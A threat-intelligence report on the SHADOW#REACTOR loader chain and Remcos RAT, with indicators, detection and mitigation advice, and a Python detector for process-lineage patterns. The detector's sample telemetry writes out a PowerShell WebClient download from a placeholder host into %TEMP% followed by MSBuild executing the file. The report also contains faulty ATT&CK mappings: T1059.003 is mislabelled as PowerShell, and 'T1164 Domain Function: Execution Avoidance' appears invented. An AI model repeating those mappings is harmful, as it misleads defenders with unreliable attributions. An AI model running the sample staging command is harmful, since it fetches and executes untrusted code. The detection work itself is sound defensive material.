Full Report
Cybersecurity researchers have disclosed details of a new campaign dubbed SHADOW#REACTOR that employs an evasive multi-stage attack chain to deliver a commercially available remote administration tool called Remcos RAT and establish persistent, covert remote access. "The infection chain follows a tightly orchestrated execution path: an obfuscated VBS launcher executed via wscript.exe invokes a
Analysis Summary
# Tool/Technique: Remcos RAT
## Overview
Remcos RAT is a commercially available Remote Administration Tool leveraged in the SHADOW#REACTOR campaign to establish persistent, covert remote access on compromised systems.
## Technical Details
- Type: Malware (Remote Access Trojan)
- Platform: Windows
- Capabilities: Full remote control, configuration retrieval, backdoor functionality.
- First Seen: Not specified in context, but usage in this campaign is new.
## MITRE ATT&CK Mapping
*(Note: Mappings are derived from the known capabilities of Remcos RAT and the deployment method described.)*
- TA0003 - Persistence
  - T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Implied by RAT establishing persistence)
- TA0011 - Command and Control
  - T1071 - Application Layer Protocol (RAT communication)
- TA0005 - Defense Evasion
  - T1027 - Obfuscated Files or Information (Used in initial stages to drop/invoke Remcos)
## Functionality
### Core Capabilities
- Establishing covert remote access via a backdoor.
- Deploying finalized payload on the compromised host.
### Advanced Features
- Configuration is fetched dynamically post-deployment from a remote host, allowing for flexible targeting or updates.
- The deployment chain is highly evasive, utilizing multi-stage execution, in-memory loading, and LOLBin abuse.
## Indicators of Compromise
- File Hashes: Not specified in context.
- File Names: The final payload's file name is not specified in context; the deployment framework drops:
  - `win64.vbs` (Obfuscated VBS launcher)
  - `qpwoe64.txt` or `qpwoe32.txt` (Text-based payload fragments)
  - `jdywa.ps1` (Secondary PowerShell script)
- Registry Keys: Not specified in context.
- Network Indicators: Communication endpoints used to fetch VBS and text payloads (Defanged reference: remote host).
- Behavioral Indicators:
  - Execution of VBS via `wscript.exe`.
  - Use of PowerShell for downloading and payload reconstruction.
  - Heavy reliance on in-memory execution (.NET Reactor–protected assembly).
  - Abuse of `MSBuild.exe` for final execution (LOLBin abuse).
## Associated Threat Actors
- Not attributed to a known threat group; activity assessed as broad and opportunistic, aligning with Initial Access Brokers (IABs).
## Detection Methods
- Signature-based detection: Ineffective against this highly dynamic, in-memory loader structure, which relies on text intermediates.
- Behavioral detection: Monitoring for sequential execution: `wscript.exe` spawning PowerShell, subsequent file drops in `%TEMP%`, and execution initiated by `MSBuild.exe` loading .NET assemblies.
- YARA rules: Should target signatures within the reconstructed payloads or the .NET Reactor assembly, if extractable.
## Mitigation Strategies
- Prevention measures: Restricting execution of scripts (VBS/PowerShell) via application control policies where possible. Monitoring for suspicious script execution chains initiated by user interaction (e.g., opening a document leading to VBS execution).
- Hardening recommendations: Implementing EDR solutions capable of deep memory inspection and detecting LOLBin abuse, specifically focusing on `MSBuild.exe` being used to execute code rather than compile projects.
## Related Tools/Techniques
- **SHADOW#REACTOR Campaign:** The multi-stage deployment methodology utilizing text-only stagers and memory reconstruction.
- **.NET Reactor:** Used to protect and obfuscate the core reflective loader assembly, complicating static analysis.
- **PowerShell Downloader/Staging:** Use of **System.Net.WebClient** within PowerShell to download file fragments.
- **MSBuild.exe:** Used as a Living-Off-The-Land Binary (LOLBin) for final payload execution, linked to T1218 (Signed Binary Proxy Execution).
---
# Tool/Technique: SHADOW#REACTOR Infection Chain (Loader Framework)
## Overview
SHADOW#REACTOR refers to the specific, evasive, multi-stage infection chain used by the attackers to deploy the Remcos RAT. It utilizes modularity, text-only intermediates, and in-memory reconstruction to evade traditional detection methods.
## Technical Details
- Type: Attack Framework / Technique Chain
- Platform: Windows
- Capabilities: Evasion, multi-stage execution, ensuring payload integrity, persistence establishment.
- First Seen: Recent campaign disclosed by researchers (circa Jan 2026 context).
## MITRE ATT&CK Mapping
- TA0002 - Execution
  - T1059.003 - Command and Scripting Interpreter: Windows Command Shell (PowerShell)
  - T1204.002 - User Execution: Malicious File
- TA0003 - Persistence
  - T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Implied by persistence setting)
- TA0005 - Defense Evasion
  - T1055 - Process Injection (Implied by in-memory loading)
  - T1164 - Domain Function: Execution Avoidance (Use of text intermediate files)
## Functionality
### Core Capabilities
- **Obfuscated VBS Launcher:** Initiates the chain using `wscript.exe`.
- **Text-Only Staging:** Downloads fragmented, text-based payloads (`qpwoe*.txt`) to complicate file-based scanning.
- **Self-Healing Download:** Looping mechanism in the PowerShell stager checks file existence/size to ensure complete payload retrieval before proceeding.
### Advanced Features
- **In-Memory Reconstruction:** Payloads are reassembled from text fragments and loaded directly into memory using a .NET Reactor–protected assembly.
- **Anti-Analysis Checks:** The secondary PowerShell script includes anti-debugging and anti-VM checks.
- **LOLBin Abuse:** Final execution leverages `MSBuild.exe` to launch the Remcos RAT, masking the malicious activity as legitimate system operations.
## Indicators of Compromise
- File Hashes: Not specified in context.
- File Names: `win64.vbs`, `qpwoe64.txt`, `jdywa.ps1`.
- Registry Keys: Not specified in context.
- Network Indicators: Communication to the same remote host for initial VBS file and subsequent text payloads.
- Behavioral Indicators:
  - Execution of VBS scripts via `wscript.exe`.
  - PowerShell script downloading content and saving it as a TXT file in `%TEMP%`.
  - Execution flow moving from VBS → PowerShell 1 → PowerShell 2 (in memory) → `MSBuild.exe`.
  - Loop mechanism for re-downloading missing/incomplete payload fragments.
## Associated Threat Actors
- Activity assessed to be broad and opportunistic, characteristic of Initial Access Brokers (IABs).
## Detection Methods
- Behavioral detection is key: Monitoring the specific sequence of process creation and file interaction within the `%TEMP%` directory, especially the invocation of Windows build tools (`MSBuild.exe`) without associated compilation activity.
- Content inspection for the known VBS and PowerShell stager artifacts, despite obfuscation.
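Both Detection Methods sections above describe the same behavioural sequence: a script host (`wscript.exe`) spawning PowerShell, PowerShell writing `.txt` fragments into `%TEMP%`, and `MSBuild.exe` being launched from that lineage without a project to build. The script below is an added example, not code from the report or from any vendor, that implements that sequence check over process-creation events. It assumes Sysmon-style fields (pid, parent pid, image basename, command line); the sample events are constructed here and the host/path values in them are placeholders, not indicators from the campaign.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    pid: int
    ppid: int
    image: str      # executable basename, e.g. "wscript.exe"
    cmdline: str


# Constructed sample telemetry (not from the report): one legitimate build under
# Visual Studio and one chain matching the SHADOW#REACTOR sequence.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", "wscript.exe C:\\Users\\u\\Downloads\\win64.vbs"),
    ProcEvent(210, 200, "powershell.exe",
              "powershell.exe -w hidden -ep bypass -c \"(New-Object System.Net.WebClient)"
              ".DownloadFile('http://example.invalid/x', "
              "'C:\\Users\\u\\AppData\\Local\\Temp\\qpwoe64.txt')\""),
    ProcEvent(220, 210, "msbuild.exe",
              "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe "
              "C:\\Users\\u\\AppData\\Local\\Temp\\qpwoe64.txt"),
    ProcEvent(300, 1, "devenv.exe", "devenv.exe"),
    ProcEvent(310, 300, "msbuild.exe", "MSBuild.exe C:\\src\\app\\app.csproj /t:Build"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Download primitives named in the report (WebClient) plus common equivalents.
DOWNLOAD_RE = re.compile(r"(system\.net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b)", re.I)
# A .txt written somewhere under a Temp directory.
TEMP_TXT_RE = re.compile(r"\\temp\\[^\s'\"]+\.txt", re.I)
# Anything MSBuild would normally be asked to build.
PROJECT_RE = re.compile(r"\.(csproj|vbproj|vcxproj|proj|sln)\b", re.I)


def build_tree(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestry(pid: int, tree: Dict[int, ProcEvent], limit: int = 16) -> List[str]:
    """Return [self, parent, grandparent, ...] image names, bounded to avoid ppid loops."""
    chain: List[str] = []
    cur = tree.get(pid)
    while cur is not None and len(chain) < limit:
        chain.append(cur.image.lower())
        cur = tree.get(cur.ppid)
    return chain


def is_temp_txt_download(ev: ProcEvent) -> bool:
    """PowerShell fetching content and saving it as a .txt under %TEMP%."""
    return (ev.image.lower() in SHELLS
            and DOWNLOAD_RE.search(ev.cmdline) is not None
            and TEMP_TXT_RE.search(ev.cmdline) is not None)


def is_msbuild_without_project(ev: ProcEvent) -> bool:
    """MSBuild.exe invoked with no project/solution on the command line."""
    return ev.image.lower() == "msbuild.exe" and PROJECT_RE.search(ev.cmdline) is None


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Flag events whose own behaviour and process ancestry match the staging chain."""
    tree = build_tree(events)
    findings: List[Tuple[int, str]] = []
    for ev in events:
        chain = ancestry(ev.pid, tree)
        parents = chain[1:]
        if is_temp_txt_download(ev) and any(p in SCRIPT_HOSTS for p in parents):
            findings.append((ev.pid, "script host -> PowerShell download of .txt into %TEMP%"))
        if is_msbuild_without_project(ev) and any(p in SHELLS for p in parents):
            findings.append((ev.pid, "MSBuild.exe without a project, lineage: " + " <- ".join(chain)))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The ancestry walk is what separates this from a simple command-line grep: the devenv-launched `MSBuild.exe` (pid 310) is ignored because it has a project file and no script host or shell above it, while pid 220 is flagged on both counts. In production, feed the same functions from your EDR's process table and add the `%TEMP%` file-write events (Sysmon ID 11) as a second signal.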
## Mitigation Strategies
- **Application Control:** Restrict the execution path for `wscript.exe` and PowerShell, or specifically block the execution of obfuscated/encoded scripts.
- **Network Segmentation/Firewall:** Block outbound connections from non-standard processes (like script hosts) attempting to download textual data from untrusted sources.
- **System Hardening:** Prevent normal users from storing and executing arbitrary scripts/code in user directories like `%TEMP%`.
## Related Tools/Techniques
- Remcos RAT (Final Payload)
- Living-Off-The-Land Binaries (LOLBins) Abuse (Specifically MSBuild.exe)
- Reflective DLL Injection (In-memory loading of the .NET assembly)